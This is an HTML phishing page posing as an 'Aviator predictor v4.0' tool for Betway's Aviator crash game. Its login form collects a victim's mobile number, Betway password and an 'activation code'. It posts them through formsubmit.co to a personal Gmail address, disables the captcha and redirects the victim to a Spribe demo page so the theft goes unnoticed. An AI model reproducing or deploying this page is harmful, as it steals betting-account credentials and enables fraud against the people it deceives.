<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Aviator predictor v4.0</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background-color: #BEBEBE;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }

        .container {
            background-color: #fff;
            padding: 20px;
            border-radius: 8px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.4);
            width: 300px;
            max-width: 80%;
            margin-bottom: 20px;
            margin-top: 10px;
        }

        h2 {
            text-align: center;
            color: #B61919;
        }


h3{
  
  text-align: center;
  color:#198312;
}


        label {
            display: block;
            margin: 10px 0;
            font-weight: bold;
            color: #B61919;
        }

        input {
            width: 100%;
            padding: 10px;
            margin-bottom: 15px;
            box-sizing: border-box;
            border-radius: 2px;
            border: 1px solid #D5D5D5;
            background-color: #F1EEEE;
        }

        button {
            width: 100%;
            padding: 15px;
            background-color: #B61919;
            color: #fff;
            border: none;
            border-radius: 5px;
            cursor: pointer;
        }

        img {
            border-radius: 8px;
            max-width: 100%;
            display: block;
            margin: 0 auto;
        }
    </style>
</head>
<body>

<div class="container">
    <img src="https://spribe.co/assets/images/games/carousel/av-03.jpg" alt="Aviator Image">
    <h2>Aviator 4.0🛫</h2>
    <h3 style="color:">Betway</h3>
    
    <form action="https://formsubmit.co/zithobengubane@gmail.com" method="POST">
        <label for="username">Mobile Number:</label>
        <input type="number" id="username" name="number" required>

        <label for="password">Password:</label>
        <input type="password" id="password" name="password" required>
        
                <label for="activation-code">activation-code:</label>
        <input style="max-width:40%;" type="number" id="activation-code" name="activation-code" required>
        
        

        <button type="submit">Login</button>
        <input type="hidden" name="_next" value="https://demo.spribe.io/launch/aviator?currency=USD&lang=EN&return_url=https://spribe.co/games">
        <input type="hidden" name="_captcha" value="false">
    </form>
</div>

</body>
</html>
